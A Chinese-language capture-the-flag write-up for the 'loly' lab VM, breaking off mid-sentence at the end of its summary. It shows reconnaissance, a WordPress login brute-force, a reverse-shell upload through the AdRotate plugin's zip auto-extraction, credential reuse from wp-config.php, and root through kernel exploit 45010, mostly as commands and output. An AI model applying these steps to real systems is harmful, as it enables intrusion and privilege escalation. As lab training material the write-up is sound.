loly 靶机

信息收集

┌──(kali㉿kali)-[~/Downloads/loly]
└─$ sudo nmap --min-rate 10000 -p- 192.1.1.144          
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-26 09:56 EDT
Nmap scan report for 192.1.1.144
Host is up (0.00085s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:87:63:9E (VMware)

Nmap done: 1 IP address (1 host up) scanned in 9.02 seconds

只开放了 80 端口？UDP 扫描试试

┌──(kali㉿kali)-[~/Downloads/loly]
└─$ sudo nmap --top-ports 20 -sU 192.1.1.144   
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-26 09:58 EDT
Nmap scan report for 192.1.1.144
Host is up (0.00045s latency).

PORT      STATE         SERVICE
53/udp    closed        domain
67/udp    open|filtered dhcps
68/udp    open|filtered dhcpc
69/udp    closed        tftp
123/udp   closed        ntp
135/udp   open|filtered msrpc
137/udp   closed        netbios-ns
138/udp   closed        netbios-dgm
139/udp   closed        netbios-ssn
161/udp   closed        snmp
162/udp   closed        snmptrap
445/udp   open|filtered microsoft-ds
500/udp   open|filtered isakmp
514/udp   open|filtered syslog
520/udp   open|filtered route
631/udp   closed        ipp
1434/udp  open|filtered ms-sql-m
1900/udp  closed        upnp
4500/udp  closed        nat-t-ike
49152/udp open|filtered unknown
MAC Address: 00:0C:29:87:63:9E (VMware)

Nmap done: 1 IP address (1 host up) scanned in 14.45 seconds

没收获，版本探测吧

┌──(kali㉿kali)-[~/Downloads/loly]
└─$ sudo nmap -sT -sV -sC -O -p80 192.1.1.144            
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-26 09:59 EDT
Nmap scan report for 192.1.1.144
Host is up (0.00043s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Welcome to nginx!
MAC Address: 00:0C:29:87:63:9E (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.45 seconds

看来没什么突破口了，80 端口直接进去是默认界面

目录爆破

目录爆破找一找

┌──(kali㉿kali)-[~/Downloads/loly]
└─$ sudo dirsearch -u http://192.1.1.144               

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                    
 (_||| _) (/_(_|| (_| )                                                                                             
                                                                                                                    
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.1.1.144/_23-08-26_10-00-09.txt

Error Log: /root/.dirsearch/logs/errors-23-08-26_10-00-09.log

Target: http://192.1.1.144/

[10:00:09] Starting: 
[10:00:49] 200 -    7KB - /wordpress/wp-login.php                           
[10:00:49] 200 -   28KB - /wordpress/

Task Completed

wordpress 啊，在浏览器里看看

发现显示有问题，看源码发现了一个域名 loly.lc 将其写入 hosts 文件

┌──(kali㉿kali)-[~/Downloads/loly]
└─$ sudo vim /etc/hosts

再访问，显示正常了。

Wordpress 渗透

感觉还挺好看的，wpscan 一下

┌──(kali㉿kali)-[~/Downloads/loly]
└─$ sudo wpscan --url http://loly.lc/wordpress -e ap,u                                                              
[sudo] password for kali: 
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | \'_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.24
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://loly.lc/wordpress/ [192.1.1.144]
[+] Started: Mon Aug 28 02:27:05 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: nginx/1.10.3 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://loly.lc/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://loly.lc/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://loly.lc/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.5 identified (Insecure, released on 2020-08-11).
 | Found By: Rss Generator (Passive Detection)
 |  - http://loly.lc/wordpress/?feed=comments-rss2, <generator>https://wordpress.org/?v=5.5</generator>
 | Confirmed By: Emoji Settings (Passive Detection)
 |  - http://loly.lc/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.5'

[+] WordPress theme in use: feminine-style
 | Location: http://loly.lc/wordpress/wp-content/themes/feminine-style/
 | Last Updated: 2023-08-01T00:00:00.000Z
 | Readme: http://loly.lc/wordpress/wp-content/themes/feminine-style/readme.txt
 | [!] The version is out of date, the latest version is 3.0.4
 | Style URL: http://loly.lc/wordpress/wp-content/themes/feminine-style/style.css?ver=5.5
 | Style Name: Feminine Style
 | Style URI: https://www.acmethemes.com/themes/feminine-style
 | Description: Feminine Style is a voguish, dazzling and very appealing WordPress theme. The theme is completely wo...
 | Author: acmethemes
 | Author URI: https://www.acmethemes.com/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.0.0 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://loly.lc/wordpress/wp-content/themes/feminine-style/style.css?ver=5.5, Match:  Version: 1.0.0

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] adrotate
 | Location: http://loly.lc/wordpress/wp-content/plugins/adrotate/
 | Last Updated: 2023-08-14T14:57:00.000Z
 | [!] The version is out of date, the latest version is 5.12.4
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 5.8.6.2 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://loly.lc/wordpress/wp-content/plugins/adrotate/readme.txt

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <======================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] loly
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] A WordPress Commenter
 | Found By: Rss Generator (Passive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Mon Aug 28 02:27:09 2023
[+] Requests Done: 56
[+] Cached Requests: 7
[+] Data Sent: 15.305 KB
[+] Data Received: 428.714 KB
[+] Memory used: 246.496 MB
[+] Elapsed time: 00:00:04

发现了一个插件 adrotate 和一个用户名 loly

搜索此插件是否有漏洞，搜到的都是老版本的漏洞。又尝试了一下搜索 wordpress 版本的漏洞，也没收获，忘记密码界面尝试了 admin 和 loly，确认了没有 admin 用户名

那就只能尝试爆破了，使用 burp 抓包，然后 burp 自带的字典来爆破

得到了一个密码 fernando

尝试使用此密码登录后台。

反弹shell

有个很尴尬的问题，似乎修改主题的源码和上传主题和插件都被扣掉了。翻来翻去感觉突破点只有 adrotate 插件中管理资源的界面了

有个上传文件的位置，但是这个地方应该是白名单，而且使用 %00 截断也没法绕过，卡了一段时间。仔细看了一遍支持的格式，发现其中有 zip，注释里也说了会自动解压，那就把反弹 shell 的 php 文件压缩后上传上去

┌──(kali㉿kali)-[~/Downloads/loly]
└─$ zip php.zip php-reverse-shell.php 
  adding: php-reverse-shell.php (deflated 60%)

虽然提示了上传成功，但是在底下没看到回显

刚开始以为没上传成功，又卡了一段时间，尝试 curl，发现有反弹 shell 成功了

www-data@ubuntu:/$ whoami
whoami
www-data
www-data@ubuntu:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@ubuntu:/$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:87:63:9e brd ff:ff:ff:ff:ff:ff
    inet 192.1.1.144/24 brd 192.1.1.255 scope global ens33
       valid_lft forever preferred_lft forever
    inet6 fe80::20c:29ff:fe87:639e/64 scope link 
       valid_lft forever preferred_lft forever
www-data@ubuntu:/$ uname -a
uname -a
Linux ubuntu 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
www-data@ubuntu:/$ sudo -l
[sudo] password for www-data

提权

看看有哪些用户

www-data@ubuntu:/$ ls -alih /home 
ls -alih /home
total 12K
655361 drwxr-xr-x  3 root root 4.0K Aug 19  2020 .
     2 drwxr-xr-x 22 root root 4.0K Aug 19  2020 ..
655370 drwxr-xr-x  3 loly loly 4.0K Aug 27 19:31 loly

有个 loly 的用户，接下来去看看 wordpress 的配置文件

www-data@ubuntu:~/html/wordpress$ ls  
ls
index.php        wp-blog-header.php    wp-includes        wp-settings.php
license.txt      wp-comments-post.php  wp-links-opml.php  wp-signup.php
readme.html      wp-config.php         wp-load.php        wp-trackback.php
wp-activate.php  wp-content            wp-login.php       xmlrpc.php
wp-admin         wp-cron.php           wp-mail.php
www-data@ubuntu:~/html/wordpress$ cat wp-config.php
cat wp-config.php

define( 'DB_NAME', 'wordpress' );

/** MySQL database username */
define( 'DB_USER', 'wordpress' );

/** MySQL database password */
define( 'DB_PASSWORD', 'lolyisabeautifulgirl' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

发现了数据库连接的密码，尝试用这个密码登录 loly 用户。同时又使用爆破出的密码和这个密码，尝试 su 切换为 root 用户，失败。

www-data@ubuntu:~/html/wordpress$ su loly
su loly
Password: lolyisabeautifulgirl

loly@ubuntu:/var/www/html/wordpress$ whoami
whoami
loly
loly@ubuntu:/var/www/html/wordpress$ id
id
uid=1000(loly) gid=1000(loly) groups=1000(loly),4(adm),24(cdrom),30(dip),46(plugdev),114(lpadmin),115(sambashare)
loly@ubuntu:/var/www/html/wordpress$ sudo -l 
sudo -l
[sudo] password for loly: lolyisabeautifulgirl

Sorry, user loly may not run sudo on ubuntu.

尝试查看 SUID 文件、passwd 和 shadow 文件权限、家目录下的敏感文件，均无收获。

尝试使用 linpeas.sh 来辅助收集信息，依然没有收获

只能尝试内核提权了

loly@ubuntu:/tmp$ uname -a                                                                                           
uname -a                                                                                                             
Linux ubuntu 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux             
loly@ubuntu:/tmp$ cat /etc/issue                                                                                     
cat /etc/issue                                                                                                       
Ubuntu 16.04.1 LTS \n \l 

筛选一下

比较符合的有这些。在优先级的选择上我经验还是不太足，逐个尝试了四五个才找到哪个可以提权成功

┌──(kali㉿kali)-[~/Downloads/loly]
└─$ searchsploit -m 45010 
  Exploit: Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/45010
     Path: /usr/share/exploitdb/exploits/linux/local/45010.c
    Codes: CVE-2017-16995
 Verified: True
File Type: C source, ASCII text
Copied to: /home/kali/Downloads/loly/45010.c

loly@ubuntu:/tmp$ gcc 45010.c -o 45010  
gcc 45010.c -o 45010
loly@ubuntu:/tmp$ ./45010  
./45010
[.] 
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.] 
[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.] 
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff8800742c2500
[*] Leaking sock struct from ffff880079da3fc0
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff88007805ef00
[*] UID from cred structure: 1000, matches the current: 1000
[*] hammering cred structure at ffff88007805ef00
[*] credentials patched, launching shell...
# whoami
whoami
root
# id
id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),114(lpadmin),115(sambashare),1000(loly)
# uname -a
uname -a
Linux ubuntu 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
# cd /root
cd /root
# ls
ls
root.txt
# cat root.txt
cat root.txt
  ____               ____ ____  ____  
 / ___| _   _ _ __  / ___/ ___||  _ \ 
 \___ \| | | | '_ \| |   \___ \| |_) |
  ___) | |_| | | | | |___ ___) |  _ < 
 |____/ \__,_|_| |_|\____|____/|_| \_\
                                      
Congratulations. I'm BigCityBoy

关于选择 exp 上，可以结合 searchploit 和 linpeas 的推荐综合考虑

总结

最折磨的地方还是内核提权的过程，这方面感觉没什么很好地方法，只能